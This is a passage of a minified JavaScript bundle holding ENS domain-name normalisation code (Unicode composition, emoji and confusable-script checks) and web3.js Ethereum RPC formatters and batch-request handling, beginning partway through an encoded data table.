/TZZHSmyVNq7viIHE6DBK7Qp07Iz55EM8SYtQvZf/obBniTWi5C2/ovHfw4VndkE5XYdjOhCMRjDeOEfXeN/CwfGduiUIfsoFeUxXeQXba7c7972XNv8w+dTjjUM0QeNAReW+J014dKAD/McQYXT7c0GQPIkn3Ll6R7gGjuiQoZD0TEeEqQpKoZ15g/0OPQI17QiSv9AUROa/V/TQN3dvLArec3RrsYlvBm1b8LWzltdugsC50lNKYLEp2a+ZZYqPejULRlOJh5zj/LVMyTDvwKhMxxwuDkxJ1QpoNI0OTWLom4Z71SNzI9TV1iXJrIu9Wcnd+MCaAw8o1jSXd94YU/1gnkrC9BUEOtQvEIQ7g0i6h+KL2JKk8Ydl7HruvgWMSAmNe+LshGhV4qnWHhO9/RIPQzY1tHRj2VqOyNsDpK0cww+56AdDC4gsWwY0XxoucIWIqs/GcwnWqlaT0KPr8mbK5U94/301i1WLt4YINTVvCFBrFZbIbY8eycOdeJ2teD5IfPLCRg7jjcFTwlMFNl9zdh/o3E/hHPwj7BWg0MU09pPrBLbrCgm54A6H+I6v27+jL5gkjWg/iYdks9jbfVP5y/n0dlgWEMlKasl7JvFZd56LfybW1eeaVO0gxTfXZwD8G4SI116yx7UKVRgui6Ya1YpixqXeNLc8IxtAwCU5IhwQgn+NqHnRaDv61CxKhOq4pOX7M6pkA+Pmpd4j1vn6ACUALoLLc4vpXci8VidLxzm7qFBe7s+quuJs6ETYmnpgS3LwSZxPIltgBDXz8M1k/W2ySNv2f9/NPhxLGK2D21dkHeSGmenRT3Yqcdl0m/h3OYr8V+lXNYGf8aCCpd4bWjE4QIPj7vUKN4Nrfs7ML6Y2OyS830JCnofg/k7lpFpt4SqZc5HGg1HCOrHvOdC8bP6FGDbE/VV0mX4IakzbdS/op+Kt3G24/8QbBV7y86sGSQ/vZzU8FXs7u6jIvwchsEP2BpIhW3G8uWNwa3HmjfH/ZjhhCWvluAcF+nMf14ClKg5hGgtPLJ98ueNAkc5Hs2WZlk2QHvfreCK1CCGO6nMZVSb99VM/ajr8WHTte9JSmkXq/i/U943HEbdzW6Re/S88dKgg8pGOLlAeNiqrcLkUR3/aClFpMXcOUP3rmETcWSfMXZE3TUOi8i+fqRnTYLflVx/Vb/6GJ7eIRZUA6k3RYR3iFSK9c4iDdNwJuZL2FKz/IK5VimcNWEqdXjSoxSgmF0UPlDoUlNrPcM7ftmA8Y9gKiqKEHuWN+AZRIwtVSxye2Kf8rM3lhJ5XcBXU9n4v0Oy1RU2M+4qM8AQPVwse8ErNSob5oFPWxuqZnVzo1qB/IBxkM3EVUKFUUlO3e51259GgNcJbCmlvrdjtoTW7rChm1wyCKzpCTwozUUEOIcWLneRLgMXh+SjGSFkAllzbGS5HK7LlfCMRNRDSvbQPjcXaenNYxCvu2Qyznz6StuxVj66SgI0T8B6/sfHAJYZaZ78thjOSIFumNWLQbeZixDCCC+v0YBtkxiBB3jefHqZ/dFHU+crbj6OvS1x/JDD7vlm7zOVPwpUC01nhxZuY/63E7g");
                function b(e) {
                    return e >> 24 & 255;
                }
                function E(e) {
                    return 16777215 & e;
                }
                const A = new Map(s(v).flatMap((e, t)=>e.map((e)=>[
                            e,
                            t + 1 << 24
                        ]))), _ = new Set(o(v)), w = new Map, T = new Map;
                for (let [e, t] of a(v)){
                    if (!_.has(e) && 2 == t.length) {
                        let [r, n] = t, i = T.get(r);
                        i || (i = new Map, T.set(r, i)), i.set(n, e);
                    }
                    w.set(e, t.reverse());
                }
                const R = 44032, I = 4352, S = 4449, P = 4519;
                function O(e) {
                    return e >= R && e < 55204;
                }
                function x(e, t) {
                    if (e >= I && e < 4371 && t >= S && t < 4470) return R + 588 * (e - I) + 28 * (t - S);
                    if (O(e) && t > P && t < 4547 && (e - R) % 28 == 0) return e + (t - P);
                    {
                        let r = T.get(e);
                        return r && (r = r.get(t), r) ? r : -1;
                    }
                }
                function M(e) {
                    let t = [], r = [], n = !1;
                    function i(e) {
                        let r = A.get(e);
                        r && (n = !0, e |= r), t.push(e);
                    }
                    for (let n of e)for(;;){
                        if (n < 128) t.push(n);
                        else if (O(n)) {
                            let e = n - R, t = e % 588 / 28 | 0, r = e % 28;
                            i(I + (e / 588 | 0)), i(S + t), r > 0 && i(P + r);
                        } else {
                            let e = w.get(n);
                            e ? r.push(...e) : i(n);
                        }
                        if (!r.length) break;
                        n = r.pop();
                    }
                    if (n && t.length > 1) {
                        let e = b(t[0]);
                        for(let r = 1; r < t.length; r++){
                            let n = b(t[r]);
                            if (0 == n || e <= n) {
                                e = n;
                                continue;
                            }
                            let i = r - 1;
                            for(;;){
                                let r = t[i + 1];
                                if (t[i + 1] = t[i], t[i] = r, !i) break;
                                if (e = b(t[--i]), e <= n) break;
                            }
                            e = b(t[r]);
                        }
                    }
                    return t;
                }
                function B(e) {
                    return M(e).map(E);
                }
                function N(e) {
                    return function(e) {
                        let t = [], r = [], n = -1, i = 0;
                        for (let o of e){
                            let e = b(o), s = E(o);
                            if (-1 == n) 0 == e ? n = s : t.push(s);
                            else if (i > 0 && i >= e) 0 == e ? (t.push(n, ...r), r.length = 0, n = s) : r.push(s), i = e;
                            else {
                                let o = x(n, s);
                                o >= 0 ? n = o : 0 == i && 0 == e ? (t.push(n), n = s) : (r.push(s), i = e);
                            }
                        }
                        return n >= 0 && t.push(n, ...r), t;
                    }(M(e));
                }
                const C = 65039, k = ".";
                function L() {
                    return new Set(o(h));
                }
                const F = new Map(a(h)), D = L(), j = L(), U = L(), H = L(), G = s(h);
                function V() {
                    return new Set([
                        o(h).map((e)=>G[e]),
                        o(h)
                    ].flat(2));
                }
                const W = h(), q = u((e)=>{
                    let t = u(h).map((e)=>e + 96);
                    if (t.length) {
                        let r = e >= W;
                        t[0] -= 32, t = g(t), r && (t = `Restricted[${t}]`);
                        let n = V(), i = V(), o = [
                            ...n,
                            ...i
                        ].sort((e, t)=>e - t);
                        return {
                            N: t,
                            P: n,
                            M: h() - 1,
                            R: r,
                            V: new Set(o)
                        };
                    }
                }), z = L(), Q = new Map;
                [
                    ...z,
                    ...L()
                ].sort((e, t)=>e - t).map((e, t, r)=>{
                    let n = h(), i = r[t] = n ? r[t - n] : {
                        V: [],
                        M: new Map
                    };
                    i.V.push(e), z.has(e) || Q.set(e, i);
                });
                for (let { V: e, M: t } of new Set(Q.values())){
                    let r = [];
                    for (let t of e){
                        let e = q.filter((e)=>e.V.has(t)), n = r.find(({ G: t })=>e.some((e)=>t.has(e)));
                        n || (n = {
                            G: new Set,
                            V: []
                        }, r.push(n)), n.V.push(t), e.forEach((e)=>n.G.add(e));
                    }
                    let n = r.flatMap(({ G: e })=>[
                            ...e
                        ]);
                    for (let { G: e, V: i } of r){
                        let r = new Set(n.filter((t)=>!e.has(t)));
                        for (let e of i)t.set(e, r);
                    }
                }
                let K = new Set, J = new Set;
                for (let e of q)for (let t of e.V)(K.has(t) ? J : K).add(t);
                for (let e of K)Q.has(e) || J.has(e) || Q.set(e, 1);
                const X = new Set([
                    ...K,
                    ...B(K)
                ]), Y = o(h), Z = function e(t) {
                    let r = u(()=>{
                        let t = o(h).map((e)=>Y[e]);
                        if (t.length) return e(t);
                    }).sort((e, t)=>t.Q.size - e.Q.size), n = h(), i = n % 3;
                    n = n / 3 | 0;
                    let s = 1 & n;
                    return n >>= 1, {
                        B: r,
                        V: i,
                        F: s,
                        S: 1 & n,
                        C: 2 & n,
                        Q: new Set(t)
                    };
                }([]);
                class $ extends Array {
                    get is_emoji() {
                        return !0;
                    }
                }
                function ee(e, t = p) {
                    let r = [];
                    ne(e[0]) && r.push("◌");
                    let n = 0, i = e.length;
                    for(let o = 0; o < i; o++){
                        let i = e[o];
                        ie(i) && (r.push(g(e.slice(n, o))), r.push(t(i)), n = o + 1);
                    }
                    return r.push(g(e.slice(n, i))), r.join("");
                }
                function te(e) {
                    return (ie(e) ? "" : `"${ee([
                        e
                    ])}" `) + p(e);
                }
                function re(e) {
                    for(let t = e.lastIndexOf(95); t > 0;)if (95 !== e[--t]) throw new Error("underscore allowed only at start");
                }
                function ne(e) {
                    return j.has(e);
                }
                function ie(e) {
                    return U.has(e);
                }
                function oe(e, t) {
                    let r = 0;
                    return e.split(k).map((e)=>{
                        let n, i = m(e), o = {
                            input: i,
                            offset: r
                        };
                        r += i.length + 1;
                        try {
                            let e, r = o.tokens = le(i, N), s = r.length;
                            if (!s) throw new Error("empty label");
                            {
                                let i = r[0], a = s > 1 || i.is_emoji;
                                if (!a && i.every((e)=>e < 128)) n = i, re(n), function(e) {
                                    if (e.length >= 4 && 45 == e[2] && 45 == e[3]) throw new Error("invalid label extension");
                                }(n), e = "ASCII";
                                else if (a && (o.emoji = !0, i = r.flatMap((e)=>e.is_emoji ? [] : e)), n = r.flatMap((e)=>!t && e.is_emoji ? de(e) : e), re(n), i.length) {
                                    if (j.has(n[0])) throw ce("leading combining mark");
                                    for(let e = 1; e < s; e++){
                                        let t = r[e];
                                        if (!t.is_emoji && j.has(t[0])) throw ce(`emoji + combining mark: "${g(r[e - 1])} + ${ee([
                                            t[0]
                                        ])}"`);
                                    }
                                    !function(e) {
                                        let t = e[0], r = f.get(t);
                                        if (r) throw ce(`leading ${r}`);
                                        let n = e.length, i = -1;
                                        for(let o = 1; o < n; o++){
                                            t = e[o];
                                            let n = f.get(t);
                                            if (n) {
                                                if (i == o) throw ce(`${r} + ${n}`);
                                                i = o + 1, r = n;
                                            }
                                        }
                                        if (i == n) throw ce(`trailing ${r}`);
                                    }(n);
                                    let t = [
                                        ...new Set(i)
                                    ], [o] = function(e) {
                                        let t = q;
                                        for (let r of e){
                                            let e = t.filter((e)=>e.V.has(r));
                                            if (!e.length) throw t === q ? ae(r) : ue(t[0], r);
                                            if (t = e, 1 == e.length) break;
                                        }
                                        return t;
                                    }(t);
                                    !function(e, t) {
                                        let { V: r, M: n } = e;
                                        for (let n of t)if (!r.has(n)) throw ue(e, n);
                                        if (n >= 0) {
                                            for(let r = 1, i = B(t).length; r < i; r++)if (j.has(t[r])) {
                                                let o = r + 1;
                                                for(; o < i && j.has(t[o]);)o++;
                                                if (o - r > n) throw new Error(`too many combining marks: ${e.N} "${g(t.slice(r - 1, o))}" (${o - r}/${n})`);
                                                r = o;
                                            }
                                        }
                                    }(o, i), function(e, t) {
                                        let r, n = [];
                                        for (let e of t){
                                            let t = Q.get(e);
                                            if (1 === t) return;
                                            if (t) {
                                                let n = t.M.get(e);
                                                if (r = r ? r.filter((e)=>n.has(e)) : [
                                                    ...n
                                                ], !r.length) return;
                                            } else n.push(e);
                                        }
                                        if (r) {
                                            for (let t of r)if (n.every((e)=>t.V.has(e))) throw new Error(`whole-script confusable: ${e.N}/${t.N}`);
                                        }
                                    }(o, t), e = o.N;
                                } else e = "Emoji";
                            }
                            o.type = e;
                        } catch (e) {
                            o.error = e;
                        }
                        return o.output = n, o;
                    });
                }
                function se(e) {
                    return e.map(({ input: t, error: r, output: n })=>{
                        if (r) {
                            let n = r.message;
                            throw new Error(1 == e.length ? n : `Invalid label "${ee(t)}": ${n}`);
                        }
                        return g(n);
                    }).join(k);
                }
                function ae(e) {
                    return new Error(`disallowed character: ${te(e)}`);
                }
                function ue(e, t) {
                    let r = te(t), n = q.find((e)=>e.P.has(t));
                    return n && (r = `${n.N} ${r}`), new Error(`illegal mixture: ${e.N} + ${r}`);
                }
                function ce(e) {
                    return new Error(`illegal placement: ${e}`);
                }
                function le(e, t) {
                    let r = [], n = [];
                    for(e = e.slice().reverse(); e.length;){
                        let i = he(e);
                        if (i) n.length && (r.push(t(n)), n = []), r.push(i);
                        else {
                            let t = e.pop();
                            if (X.has(t)) n.push(t);
                            else {
                                let e = F.get(t);
                                if (e) n.push(...e);
                                else if (!D.has(t)) throw ae(t);
                            }
                        }
                    }
                    return n.length && r.push(t(n)), r;
                }
                function de(e) {
                    return e.filter((e)=>e != C);
                }
                function he(e, t) {
                    let r, n, i = Z, o = [], s = e.length;
                    for(t && (t.length = 0); s;){
                        let a = e[--s];
                        if (i = i.B.find((e)=>e.Q.has(a)), !i) break;
                        if (i.S) n = a;
                        else if (i.C && a === n) break;
                        o.push(a), i.F && (o.push(C), s > 0 && e[s - 1] == C && s--), i.V && (r = fe(o, i), t && t.push(...e.slice(s).reverse()), e.length = s);
                    }
                    return r;
                }
                function fe(e, t) {
                    let r = $.from(e);
                    return 2 == t.V && r.splice(1, 1), r;
                }
                const pe = "valid", me = "mapped", ge = "ignored";
                function ye(e) {
                    return e == pe || e == me;
                }
                function ve(e) {
                    return e.some((e)=>H.has(e));
                }
                function be(e) {
                    for(let t = 0; t < e.length; t++)if (e[t].type == pe) {
                        let r = t + 1;
                        for(; r < e.length && e[r].type == pe;)r++;
                        e.splice(t, r - t, {
                            type: pe,
                            cps: e.slice(t, r).flatMap((e)=>e.cps)
                        });
                    }
                    return e;
                }
                t.ens_beautify = function(e) {
                    let t = oe(e, !0);
                    for (let { type: e, output: r, error: n } of t)if (!n && "Greek" !== e) {
                        let e = 0;
                        for(;;){
                            let t = r.indexOf(958, e);
                            if (t < 0) break;
                            r[t] = 926, e = t + 1;
                        }
                    }
                    return se(t);
                }, t.ens_emoji = function() {
                    let e = [];
                    return function t(r, n, i) {
                        if (r.S) i = n[n.length - 1];
                        else if (r.C && i === n[n.length - 1]) return;
                        r.F && n.push(C), r.V && e.push(fe(n, r));
                        for (let e of r.B)for (let r of e.Q)t(e, [
                            ...n,
                            r
                        ], i);
                    }(Z, []), e.sort(y);
                }, t.ens_normalize = function(e) {
                    return se(oe(e));
                }, t.ens_normalize_fragment = function(e, t) {
                    let r = t ? B : N;
                    return e.split(k).map((e)=>g(le(m(e), r).flatMap((e)=>e.is_emoji ? de(e) : e))).join(k);
                }, t.ens_split = oe, t.ens_tokenize = function e(t, { nf: r = !0 } = {}) {
                    let n = m(t).reverse(), i = [], o = [];
                    for(; n.length;){
                        let e = he(n, i);
                        if (e) o.push({
                            type: "emoji",
                            emoji: e,
                            input: i.slice(),
                            cps: de(e)
                        });
                        else {
                            let e = n.pop();
                            if (46 == e) o.push({
                                type: "stop",
                                cp: e
                            });
                            else if (X.has(e)) o.push({
                                type: pe,
                                cps: [
                                    e
                                ]
                            });
                            else if (D.has(e)) o.push({
                                type: ge,
                                cp: e
                            });
                            else {
                                let t = F.get(e);
                                t ? o.push({
                                    type: me,
                                    cp: e,
                                    cps: t.slice()
                                }) : o.push({
                                    type: "disallowed",
                                    cp: e
                                });
                            }
                        }
                    }
                    if (r) for(let t = 0, r = -1; t < o.length; t++){
                        let n = o[t];
                        if (ye(n.type)) {
                            if (ve(n.cps)) {
                                let n = t + 1;
                                for(let e = n; e < o.length; e++){
                                    let { type: t, cps: r } = o[e];
                                    if (ye(t)) {
                                        if (!ve(r)) break;
                                        n = e + 1;
                                    } else if (t !== ge) break;
                                }
                                r < 0 && (r = t);
                                let i = o.slice(r, n), s = i.flatMap((e)=>ye(e.type) ? e.cps : []), a = N(s);
                                y(a, s) ? (o.splice(r, n - r, {
                                    type: "nfc",
                                    input: s,
                                    cps: a,
                                    tokens0: be(i),
                                    tokens: e(g(a), {
                                        nf: !1
                                    })
                                }), t = r) : t = n - 1, r = -1;
                            } else r = t;
                        } else n.type !== ge && (r = -1);
                    }
                    return be(o);
                }, t.is_combining_mark = ne, t.nfc = N, t.nfd = B, t.safe_str_from_cps = ee, t.should_escape = ie;
            },
            2191: (e, t, r)=>{
                "use strict";
                var n = [
                    "BigInt64Array",
                    "BigUint64Array",
                    "Float32Array",
                    "Float64Array",
                    "Int16Array",
                    "Int32Array",
                    "Int8Array",
                    "Uint16Array",
                    "Uint32Array",
                    "Uint8Array",
                    "Uint8ClampedArray"
                ], i = "undefined" == typeof globalThis ? r.g : globalThis;
                e.exports = function() {
                    for(var e = [], t = 0; t < n.length; t++)"function" == typeof i[n[t]] && (e[e.length] = n[t]);
                    return e;
                };
            },
            9765: (e, t, r)=>{
                "use strict";
                var n = r(7286)("%Object.getOwnPropertyDescriptor%", !0);
                if (n) try {
                    n([], "length");
                } catch (e) {
                    n = null;
                }
                e.exports = n;
            },
            1732: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.outputSyncingFormatter = t.outputPostFormatter = t.inputPostFormatter = t.outputBlockFormatter = t.outputTransactionReceiptFormatter = t.outputLogFormatter = t.inputLogFormatter = t.inputTopicFormatter = t.outputTransactionFormatter = t.inputSignFormatter = t.inputTransactionFormatter = t.inputCallFormatter = t.txInputOptionsFormatter = t.inputAddressFormatter = t.inputDefaultBlockNumberFormatter = t.inputBlockNumberFormatter = t.outputBigIntegerFormatter = t.outputProofFormatter = t.inputStorageKeysFormatter = void 0;
                const n = r(5071), i = r(9910), o = r(9970), s = r(9634), a = r(7345);
                t.inputStorageKeysFormatter = (e)=>e.map((e)=>(0, s.numberToHex)(e)), t.outputProofFormatter = (e)=>({
                        address: (0, s.toChecksumAddress)(e.address),
                        nonce: (0, s.hexToNumberString)(e.nonce),
                        balance: (0, s.hexToNumberString)(e.balance)
                    }), t.outputBigIntegerFormatter = (e)=>(0, s.toNumber)(e), t.inputBlockNumberFormatter = (e)=>{
                    if (!(0, a.isNullish)(e)) return "string" == typeof e && (0, a.isBlockTag)(e) ? e : "genesis" === e ? "0x0" : "string" == typeof e && (0, s.isHexStrict)(e) ? e.toLowerCase() : (0, s.numberToHex)(e);
                }, t.inputDefaultBlockNumberFormatter = (e, r)=>e ? (0, t.inputBlockNumberFormatter)(e) : (0, t.inputBlockNumberFormatter)(r), t.inputAddressFormatter = (e)=>{
                    if (i.Iban.isValid(e) && i.Iban.isDirect(e)) return new i.Iban(e).toAddress().toLowerCase();
                    if ((0, s.isAddress)(e)) return `0x${e.toLowerCase().replace("0x", "")}`;
                    throw new n.FormatterError(`Provided address ${e} is invalid, the capitalization checksum test failed, or it's an indirect IBAN address which can't be converted.`);
                }, t.txInputOptionsFormatter = (e)=>{
                    var r;
                    const i = Object.assign({}, e);
                    if (e.to && (i.to = (0, t.inputAddressFormatter)(e.to)), e.data && e.input) throw new n.FormatterError('You can\'t have "data" and "input" as properties of transactions at the same time, please use either "data" or "input" instead.');
                    if (!e.input && e.data && (i.input = e.data, delete i.data), e.input && !e.input.startsWith("0x") && (i.input = `0x${e.input}`), i.input && !(0, s.isHexStrict)(i.input)) throw new n.FormatterError("The input field must be HEX encoded data.");
                    return (e.gas || e.gasLimit) && (i.gas = (0, s.toNumber)(null !== (r = e.gas) && void 0 !== r ? r : e.gasLimit)), (e.maxPriorityFeePerGas || e.maxFeePerGas) && delete i.gasPrice, [
                        "gasPrice",
                        "gas",
                        "value",
                        "maxPriorityFeePerGas",
                        "maxFeePerGas",
                        "nonce",
                        "chainId"
                    ].filter((e)=>!(0, a.isNullish)(i[e])).forEach((e)=>{
                        i[e] = (0, s.numberToHex)(i[e]);
                    }), i;
                }, t.inputCallFormatter = (e, r)=>{
                    var n;
                    const i = (0, t.txInputOptionsFormatter)(e), o = null !== (n = i.from) && void 0 !== n ? n : r;
                    return o && (i.from = (0, t.inputAddressFormatter)(o)), i;
                }, t.inputTransactionFormatter = (e, r)=>{
                    var i;
                    const o = (0, t.txInputOptionsFormatter)(e);
                    if ("number" != typeof o.from && (!o.from || "object" != typeof o.from)) {
                        if (o.from = null !== (i = o.from) && void 0 !== i ? i : r, !e.from && "number" != typeof e.from) throw new n.FormatterError('The send transactions "from" field must be defined!');
                        o.from = (0, t.inputAddressFormatter)(e.from);
                    }
                    return o;
                }, t.inputSignFormatter = (e)=>(0, s.isHexStrict)(e) ? e : (0, s.utf8ToHex)(e), t.outputTransactionFormatter = (e)=>{
                    const r = Object.assign({}, e);
                    return e.blockNumber && (r.blockNumber = (0, s.hexToNumber)(e.blockNumber)), e.transactionIndex && (r.transactionIndex = (0, s.hexToNumber)(e.transactionIndex)), r.nonce = (0, s.hexToNumber)(e.nonce), r.gas = (0, s.hexToNumber)(e.gas), e.gasPrice && (r.gasPrice = (0, t.outputBigIntegerFormatter)(e.gasPrice)), e.maxFeePerGas && (r.maxFeePerGas = (0, t.outputBigIntegerFormatter)(e.maxFeePerGas)), e.maxPriorityFeePerGas && (r.maxPriorityFeePerGas = (0, t.outputBigIntegerFormatter)(e.maxPriorityFeePerGas)), e.type && (r.type = (0, s.hexToNumber)(e.type)), r.value = (0, t.outputBigIntegerFormatter)(e.value), e.to && (0, s.isAddress)(e.to) ? r.to = (0, s.toChecksumAddress)(e.to) : r.to = void 0, e.from && (r.from = (0, s.toChecksumAddress)(e.from)), r;
                }, t.inputTopicFormatter = (e)=>{
                    if ((0, a.isNullish)(e)) return null;
                    const t = String(e);
                    return (0, a.isHex)(t) ? t : (0, s.fromUtf8)(t);
                }, t.inputLogFormatter = (e)=>{
                    var r;
                    const n = (0, a.isNullish)(e) ? {} : (0, s.mergeDeep)({}, e);
                    return (0, a.isNullish)(n.fromBlock) && (n.fromBlock = o.BlockTags.LATEST), n.fromBlock = (0, t.inputBlockNumberFormatter)(n.fromBlock), (0, a.isNullish)(n.toBlock) || (n.toBlock = (0, t.inputBlockNumberFormatter)(n.toBlock)), n.topics = null !== (r = n.topics) && void 0 !== r ? r : [], n.topics = n.topics.map((e)=>Array.isArray(e) ? e.map(t.inputTopicFormatter) : (0, t.inputTopicFormatter)(e)), n.address && (n.address = Array.isArray(n.address) ? n.address.map((e)=>(0, t.inputAddressFormatter)(e)) : (0, t.inputAddressFormatter)(n.address)), n;
                }, t.outputLogFormatter = (e)=>{
                    const t = Object.assign({}, e), r = "string" == typeof e.logIndex ? e.logIndex : (0, s.numberToHex)(e.logIndex);
                    if ("string" == typeof e.blockHash && "string" == typeof e.transactionHash) {
                        const n = (0, s.sha3Raw)(`${e.blockHash.replace("0x", "")}${e.transactionHash.replace("0x", "")}${r.replace("0x", "")}`);
                        t.id = `log_${n.replace("0x", "").slice(0, 8)}`;
                    } else e.id || (t.id = void 0);
                    return e.blockNumber && (0, s.isHexStrict)(e.blockNumber) && (t.blockNumber = (0, s.hexToNumber)(e.blockNumber)), e.transactionIndex && (0, s.isHexStrict)(e.transactionIndex) && (t.transactionIndex = (0, s.hexToNumber)(e.transactionIndex)), e.logIndex && (0, s.isHexStrict)(e.logIndex) && (t.logIndex = (0, s.hexToNumber)(e.logIndex)), e.address && (t.address = (0, s.toChecksumAddress)(e.address)), t;
                }, t.outputTransactionReceiptFormatter = (e)=>{
                    if ("object" != typeof e) throw new n.FormatterError(`Received receipt is invalid: ${String(e)}`);
                    const r = Object.assign({}, e);
                    return e.blockNumber && (r.blockNumber = (0, s.hexToNumber)(e.blockNumber)), e.transactionIndex && (r.transactionIndex = (0, s.hexToNumber)(e.transactionIndex)), r.cumulativeGasUsed = (0, s.hexToNumber)(e.cumulativeGasUsed), r.gasUsed = (0, s.hexToNumber)(e.gasUsed), e.logs && Array.isArray(e.logs) && (r.logs = e.logs.map(t.outputLogFormatter)), e.effectiveGasPrice && (r.effectiveGasPrice = (0, s.hexToNumber)(e.effectiveGasPrice)), e.contractAddress && (r.contractAddress = (0, s.toChecksumAddress)(e.contractAddress)), e.status && (r.status = Boolean(parseInt(e.status, 10))), r;
                }, t.outputBlockFormatter = (e)=>{
                    const r = Object.assign({}, e);
                    return r.gasLimit = (0, s.hexToNumber)(e.gasLimit), r.gasUsed = (0, s.hexToNumber)(e.gasUsed), r.size = (0, s.hexToNumber)(e.size), r.timestamp = (0, s.hexToNumber)(e.timestamp), e.number && (r.number = (0, s.hexToNumber)(e.number)), e.difficulty && (r.difficulty = (0, t.outputBigIntegerFormatter)(e.difficulty)), e.totalDifficulty && (r.totalDifficulty = (0, t.outputBigIntegerFormatter)(e.totalDifficulty)), e.transactions && Array.isArray(e.transactions) && (r.transactions = e.transactions.map(t.outputTransactionFormatter)), e.miner && (r.miner = (0, s.toChecksumAddress)(e.miner)), e.baseFeePerGas && (r.baseFeePerGas = (0, s.hexToNumber)(e.baseFeePerGas)), r;
                }, t.inputPostFormatter = (e)=>{
                    var t;
                    const r = Object.assign({}, e);
                    return e.ttl && (r.ttl = (0, s.numberToHex)(e.ttl)), e.workToProve && (r.workToProve = (0, s.numberToHex)(e.workToProve)), e.priority && (r.priority = (0, s.numberToHex)(e.priority)), e.topics && !Array.isArray(e.topics) && (r.topics = e.topics ? [
                        e.topics
                    ] : []), r.topics = null === (t = r.topics) || void 0 === t ? void 0 : t.map((e)=>e.startsWith("0x") ? e : (0, s.fromUtf8)(e)), r;
                }, t.outputPostFormatter = (e)=>{
                    var t;
                    const r = Object.assign({}, e);
                    return e.expiry && (r.expiry = (0, s.hexToNumber)(e.expiry)), e.sent && (r.sent = (0, s.hexToNumber)(e.sent)), e.ttl && (r.ttl = (0, s.hexToNumber)(e.ttl)), e.workProved && (r.workProved = (0, s.hexToNumber)(e.workProved)), e.topics || (r.topics = []), r.topics = null === (t = r.topics) || void 0 === t ? void 0 : t.map(s.toUtf8), r;
                }, t.outputSyncingFormatter = (e)=>{
                    const t = Object.assign({}, e);
                    return t.startingBlock = (0, s.hexToNumber)(e.startingBlock), t.currentBlock = (0, s.hexToNumber)(e.currentBlock), t.highestBlock = (0, s.hexToNumber)(e.highestBlock), e.knownStates && (t.knownStates = (0, s.hexToNumber)(e.knownStates)), e.pulledStates && (t.pulledStates = (0, s.hexToNumber)(e.pulledStates)), t;
                };
            },
            6527: function(e, t, r) {
                "use strict";
                var n = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
                    void 0 === n && (n = r), e[n] = t[r];
                }), i = this && this.__setModuleDefault || (Object.create ? function(e, t) {
                    Object.defineProperty(e, "default", {
                        enumerable: !0,
                        value: t
                    });
                } : function(e, t) {
                    e.default = t;
                }), o = this && this.__exportStar || function(e, t) {
                    for(var r in e)"default" === r || Object.prototype.hasOwnProperty.call(t, r) || n(t, e, r);
                }, s = this && this.__importStar || function(e) {
                    if (e && e.__esModule) return e;
                    var t = {};
                    if (null != e) for(var r in e)"default" !== r && Object.prototype.hasOwnProperty.call(e, r) && n(t, e, r);
                    return i(t, e), t;
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.formatters = void 0, o(r(6171), t), o(r(8441), t), o(r(860), t), o(r(1819), t), o(r(8174), t), o(r(8202), t), o(r(7003), t), o(r(8165), t), o(r(1732), t), o(r(4738), t), o(r(8976), t), t.formatters = s(r(1732));
            },
            8165: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
            },
            7003: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.isSupportSubscriptions = t.isSupportedProvider = t.isLegacySendAsyncProvider = t.isLegacySendProvider = t.isEIP1193Provider = t.isLegacyRequestProvider = t.isWeb3Provider = void 0;
                const n = r(9970);
                t.isWeb3Provider = (e)=>n.Web3BaseProvider.isWeb3Provider(e), t.isLegacyRequestProvider = (e)=>"string" != typeof e && "request" in e && "Function" === e.request.constructor.name, t.isEIP1193Provider = (e)=>"string" != typeof e && "request" in e && "AsyncFunction" === e.request.constructor.name, t.isLegacySendProvider = (e)=>"string" != typeof e && "send" in e, t.isLegacySendAsyncProvider = (e)=>"string" != typeof e && "sendAsync" in e, t.isSupportedProvider = (e)=>(0, t.isWeb3Provider)(e) || (0, t.isEIP1193Provider)(e) || (0, t.isLegacyRequestProvider)(e) || (0, t.isLegacySendAsyncProvider)(e) || (0, t.isLegacySendProvider)(e), t.isSupportSubscriptions = (e)=>(0, t.isWeb3Provider)(e) ? e.supportsSubscriptions() : "string" != typeof e && "on" in e;
            },
            8202: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Web3BatchRequest = t.DEFAULT_BATCH_REQUEST_TIMEOUT = void 0;
                const i = r(9634), o = r(5071);
                t.DEFAULT_BATCH_REQUEST_TIMEOUT = 1e3, t.Web3BatchRequest = class {
                    constructor(e){
                        this._requestManager = e, this._requests = new Map;
                    }
                    get requests() {
                        return [
                            ...this._requests.values()
                        ].map((e)=>e.payload);
                    }
                    add(e) {
                        const t = i.jsonRpc.toPayload(e), r = new i.Web3DeferredPromise;
                        return this._requests.set(t.id, {
                            payload: t,
                            promise: r
                        }), r;
                    }
                    execute() {
                        return n(this, void 0, void 0, function*() {
                            if (0 === this.requests.length) return Promise.resolve([]);
                            const e = new i.Web3DeferredPromise({
                                timeout: t.DEFAULT_BATCH_REQUEST_TIMEOUT,
                                eagerStart: !0,
                                timeoutMessage: "Batch request timeout"
                            });
                            return this._processBatchRequest(e).catch((t)=>e.reject(t)), e.catch((t)=>{
                                t instanceof o.OperationTimeoutError && this._abortAllRequests("Batch request timeout"), e.reject(t);
                            }), e;
                        });
                    }
                    _processBatchRequest(e) {
                        var t, r;
                        return n(this, void 0, void 0, function*() {
                            const n = yield this._requestManager.sendBatch([
                                ...this._requests.values()
                            ].map((e)=>e.payload));
